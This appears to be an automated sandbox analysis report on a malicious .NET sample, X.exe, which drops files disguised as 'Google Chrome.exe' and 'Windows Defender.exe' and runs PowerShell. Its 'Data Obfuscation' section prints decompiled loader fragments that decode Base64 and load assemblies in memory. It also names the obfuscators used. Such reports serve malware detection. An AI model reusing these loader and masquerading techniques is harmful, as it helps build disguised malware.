                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\X.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\X.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: X.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: X.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                        Source: X.exe | Static PE information: Image base 0x140000000 > 0x60000000
                        Source: X.exe | Static file information: File size 10559488 > 1048576
                        Source: X.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0xa11800
                        Source: X.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.CZPe3SyONWjc5hj7Zt6pMdbenXpaXikMlYpqDKafLkOms,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.zZKdF8cP7z9HFwFLRzzYTFQciU5MLuHHC6ENIjMkVQdXq,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.uwhBvO1fbcTMCs5cpy4a3GxWkUK9nOFUAjU5tbLzxc4Nm,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad._5u2o12FB2HiDfSgNUYqkFFRVaw4aYHm8E3UpGOPhPKmwt,lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.zhcMYZF0QInpk1kT5sx0pNbXx64NrJThadiT87lCJABNsLFSAdhLLgBrOIoBM5pw3c3TJwachr4ojYs0LVrQgMiixm9P0n()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2],lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.LytLH5HEpuu4OIZ4MZsfCpCesChmU0ZjVIJ8b1hISUzFK3SckjwTfifsxmOb9YgG9vGxixmqOMdF76qpemglcmyKbAAsfo(Convert.FromBase64String(kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx.OITGxfhOK68wJPCo6MtHnrlyVHyKORMPliv7ZiqCMHvzYgOkhkXsK0u8OhLgWYy0dP1KoF40Axe61GDe1t57jVm5,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx._1ANXilRELSzhTddVibajQmsL6R65eHUmCCMQnnut9R9rgwYD1NjmN73hamUw91d2kZAOj5XKmA78nAeFJmPC8jmc,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx._8iftPdZwa8calZ1nwsss8I1uH4v7BY6jA7ZD9hiYFnGqGZorMhCHdEamQX3IBVvF1FMWs5O7YpqBbChOltJ4KRaS,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx.wESkSQlk2LTmddktYdbZYhIdpL53tC64r4K1fVruIFfyKcMGP1t2FBlv4Dk81tyYqH01deeRtH84HaYYKAIraLGI,_2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.bL5SxUEmaU0P2D5c7IW69D34YGlObRx()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[2],_2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.AkxQRAUaBbQFqzLtkFyQDuFOWyk5dLd(Convert.FromBase64String(y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx.OITGxfhOK68wJPCo6MtHnrlyVHyKORMPliv7ZiqCMHvzYgOkhkXsK0u8OhLgWYy0dP1KoF40Axe61GDe1t57jVm5,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx._1ANXilRELSzhTddVibajQmsL6R65eHUmCCMQnnut9R9rgwYD1NjmN73hamUw91d2kZAOj5XKmA78nAeFJmPC8jmc,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx._8iftPdZwa8calZ1nwsss8I1uH4v7BY6jA7ZD9hiYFnGqGZorMhCHdEamQX3IBVvF1FMWs5O7YpqBbChOltJ4KRaS,CGAYn8GtbqDiPtbup0K8aMbICopU4Wq7kUseDdUFH5dTtKH3ID5bU9aTVDsLDcLelNtJZKiULraIcKh2uvU7QAJx.wESkSQlk2LTmddktYdbZYhIdpL53tC64r4K1fVruIFfyKcMGP1t2FBlv4Dk81tyYqH01deeRtH84HaYYKAIraLGI,_2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.bL5SxUEmaU0P2D5c7IW69D34YGlObRx()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[2],_2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.AkxQRAUaBbQFqzLtkFyQDuFOWyk5dLd(Convert.FromBase64String(y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { y4fyaCSbdx6tceTNvcfUPWwSJvHRfiU[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs | .Net Code: btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac System.AppDomain.Load(byte[])
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs | .Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP System.AppDomain.Load(byte[])
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs | .Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: f9ZdtOKP4Q3DUGf2u4fXoYuntvta6B7 System.AppDomain.Load(byte[])
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: CJNLAh9oPQ1izWAaun4lIPPspdIeuIk System.AppDomain.Load(byte[])
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: CJNLAh9oPQ1izWAaun4lIPPspdIeuIk
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: f9ZdtOKP4Q3DUGf2u4fXoYuntvta6B7 System.AppDomain.Load(byte[])
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: CJNLAh9oPQ1izWAaun4lIPPspdIeuIk System.AppDomain.Load(byte[])
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | .Net Code: CJNLAh9oPQ1izWAaun4lIPPspdIeuIk
                        Source: X.exe, 00000000.00000000.1358812392.0000000000122000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: dotNetProtector
                        Source: X.exe, 00000000.00000000.1358812392.0000000000122000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: jSystem.ComponentModelLateCallProtectorProjectByDrakeLamGZipStreamMemoryStreamProgramSystemToBooleanSystem.ComponentModel.DesignAppDomainget_CurrentDomainGetFileNameWithoutExtensionSystem.IO.CompressionMyApplicationNineRays.Obfuscator.EvaluationSystem.ReflectionExceptionProcessStartInfoDirectoryInfoSleepZYXDNGuarderResourceManagerToIntegerSystem.CodeDom.Compilerget_CurrentUserBitConverterServerComputerMyComputerClearProjectErrorSetProjectErrorGetEnumeratorActivator.ctor.cctordotNetProtectorSystem.DiagnosticsMicrosoft.VisualBasic.DevicesMyWebServicesMicrosoft.VisualBasic.ApplicationServicesSystem.Runtime.InteropServicesMicrosoft.VisualBasic.CompilerServicesSystem.Runtime.CompilerServicesMicrosoft.VisualBasic.MyServicesmqszk.ResourcesSystem.ResourcesExpandEnvironmentVariablesFileAttributesSetAttributesWriteAllBytesStringsEqualsContainsConversionsRuntimeHelpersOperatorsProcessset_ArgumentsExistsConcatConcatenateObjectSubtractObjectGetObjectMyProjectCollectSplitWaitForExitEnvironmentget_CurrentStartConvertinputMoveNext
                        Source: X.exe | String found in binary or memory: dotNetProtector
                        Source: X.exe | String found in binary or memory: jSystem.ComponentModelLateCallProtectorProjectByDrakeLamGZipStreamMemoryStreamProgramSystemToBooleanSystem.ComponentModel.DesignAppDomainget_CurrentDomainGetFileNameWithoutExtensionSystem.IO.CompressionMyApplicationNineRays.Obfuscator.EvaluationSystem.ReflectionExceptionProcessStartInfoDirectoryInfoSleepZYXDNGuarderResourceManagerToIntegerSystem.CodeDom.Compilerget_CurrentUserBitConverterServerComputerMyComputerClearProjectErrorSetProjectErrorGetEnumeratorActivator.ctor.cctordotNetProtectorSystem.DiagnosticsMicrosoft.VisualBasic.DevicesMyWebServicesMicrosoft.VisualBasic.ApplicationServicesSystem.Runtime.InteropServicesMicrosoft.VisualBasic.CompilerServicesSystem.Runtime.CompilerServicesMicrosoft.VisualBasic.MyServicesmqszk.ResourcesSystem.ResourcesExpandEnvironmentVariablesFileAttributesSetAttributesWriteAllBytesStringsEqualsContainsConversionsRuntimeHelpersOperatorsProcessset_ArgumentsExistsConcatConcatenateObjectSubtractObjectGetObjectMyProjectCollectSplitWaitForExitEnvironmentget_CurrentStartConvertinputMoveNext
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAB67D2A5 pushad ; iretd 2_2_00007FFAAB67D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAB862316 push 8B485F93h; iretd 2_2_00007FFAAB86231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFAAB65D2A5 pushad ; iretd 6_2_00007FFAAB65D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFAAB77123A push E95CB705h; ret 6_2_00007FFAAB771239
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFAAB7719F2 pushad ; ret 6_2_00007FFAAB7719F9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFAAB7711FA push E95CB705h; ret 6_2_00007FFAAB771239
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFAAB842316 push 8B485F95h; iretd 6_2_00007FFAAB84231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFAAB67D2A5 pushad ; iretd 9_2_00007FFAAB67D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFAAB862316 push 8B485F93h; iretd 9_2_00007FFAAB86231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFAAB867BFC push esp; iretd 9_2_00007FFAAB867BFD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB66D2A5 pushad ; iretd 17_2_00007FFAAB66D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB78123A push E95CB605h; ret 17_2_00007FFAAB781239
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB7811FA push E95CB605h; ret 17_2_00007FFAAB781239
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB850020 push eax; iretd 17_2_00007FFAAB850039
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB8545A0 push eax; iretd 17_2_00007FFAAB8545A1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFAAB852316 push 8B485F94h; iretd 17_2_00007FFAAB85231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFAAB68D2A5 pushad ; iretd 20_2_00007FFAAB68D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFAAB872316 push 8B485F92h; iretd 20_2_00007FFAAB87231B
                        Source: Windows Defender.exe.0.dr, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.cs | High entropy of concatenated method names: 'Rute6Q5WfZvWUrj7yB49O777GXEBlczDv32ghc0AuKl7Eq7f8AlSx1K9UCYrTt8Enkzd00PAsgvJ2GaG', 'vqoXLxMurja5P63uVjV19ePPqazR47SDPa4UttMMpdIMsmJvdOHzWCZvJ5ssFQQrrO5l8H1Beh9lbFzh', 'btUmetsTApatkGtIV7Ar85mhuWhty6TScMcbnp4Bc0EWVLzoXJ3MXttQG85E0Mw6r08Bg0gK7F0sIPyW', '_9ilAP0cixqahHu4GEVeQDwOxsqe8x1q8PisWnM9J5eCC4xT42SCNWJE9AfMDBxZUoBnkzXZowCDwicnO'
                        Source: Windows Defender.exe.0.dr, zkQvGS0CbJWVNQzX5NTER9jKP2wULDi4d7anVMwHXLqxt2Tfv4P79Ovl8LhrrbpRTAHRggLj6diBqOcOOQp4tkjEnPEJC5.cs | High entropy of concatenated method names: 'Cf727bOR7tmg52RUOBjzXXW07BvwwusAZeXWQUbfS5TSAxiVeQ85Di2K7cjskToFklKtP27kh7hRErq6t1aiZtwj317DKD', 'b6Gpmr1a6DLZ0iQe5PQiXjfDgwJTVCs85bzz2miyfWUF6ZRelk5mmW9pV8b6qnqAbqQSpFjHJARDeNsHMmmBH7GM7x1Ilf', 'WWYaGiEOPbQrDeeuEOh96p36J4l3CXXUW6My42JCfgnmJ6ldEdCgyPyaIEYUIAEqZMQw3SqhV3VmScsgVvnifDENPzrzDv', 'KCHtc1PRa2W2WF8Vo67k5A', 'CS2hsHRh3siCbOd6p2HOda', 'dhPyQmjAH02BwSBgb7Jf05', 'WuvOV43onvRsDtNiqMWHAw', 'AS5Nn37UDDwO0zKIdLK7gm', '_8ULcALNWa2tKQ9ZwieNluI', 'SfeiZ7WsOxTSvCI8uMI0Yg'
                        Source: Windows Defender.exe.0.dr, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'YmUEfhQ1wTKDpAXx46A1o8Y4mpSM8r8oub0Z3xgEFg0lflxzLtSWQERHpbJScMon62EuS6s6DzKpi6Aj', '_8MfTblSGLO5n0mPc2nYdMQazaJLOrXt8NQio3PmBFNSKJNDpmDTjlXe9cJu1ibS9aU6N3niIM31qbgcA', 'zWsNhrmhwGpSQ1GT2yTf9YGIqdLugqch40onIwOyzOpbNEyMsCvbLqqNFzlBLkDJ1Ka7ndeUe0ANFikU', '_4KVsAkI14lbomkIoEVolZ3Zo6TGPNmp4s0gPSV0l7Q69pLOjmMCh9WkVERgOXOnH3ZUsqTnHHwIR4rpf'
                        Source: Windows Defender.exe.0.dr, OVvRXAYaO1Zt4j8kRspWu8Dluwd0T5ynfiFpuFFu9oL9Wutux2n6Kdfpe6PdXD.cs | High entropy of concatenated method names: 'zcPak2Bsyo8wccw7Uv3aiI37yZoliDHgleuyqwETbHQd9J045tXgkI1qlfitR4', 'LnxexLOzfmbgG7jq6maRN0QA2p2CJP8ZygHiQlLb0ppaU1fT6IN7dd1yiuDkNp', 'gJIgi2FPNaDPC4EwzsGhiY2sPhtac76AsL8impk1XIcnVzR3rnRj2XSflBROJV', '_2O1IobNQiQ8Wc5XwYvjcpyDnrG3KHW0JmvtivyJALruWtIj4LGn1tKeO3USg5x', 'H0llgP1zOdBZtDAtdx1Cxk', 'UqFolkiLKQ4JbhehxP1bzt', '_03EZcOibVWwuyQFiTqnT2s', 'G3MI0QwFp4pni6N39enaXd', 'U4z45H2vtb9BFwqlN6lVxF', 'Q6Jls5twNnDmWl4vgIiSbi'
                        Source: Windows Defender.exe.0.dr, jx9GZsYLetM8ozl7eeSUYzaQ9rVm6zahKbBJECPrIV9xeRXsM4ZcUAK0g1ype5.cs | High entropy of concatenated method names: 'StyaJjuBncIt9ThkoYTkgJYT4G2PSxngq1OvYXUuUTWkPMCl9dnBCYNLuV56Ae', '_1givnKGlzrQZPv9YZ5KOBN', 'FXCw5u2JpZHzFj705RvUW0', 'ZjqJdWqvnSaB93WE34qu6a', 'wksOBjUK8cAPfmooAuQO2D'
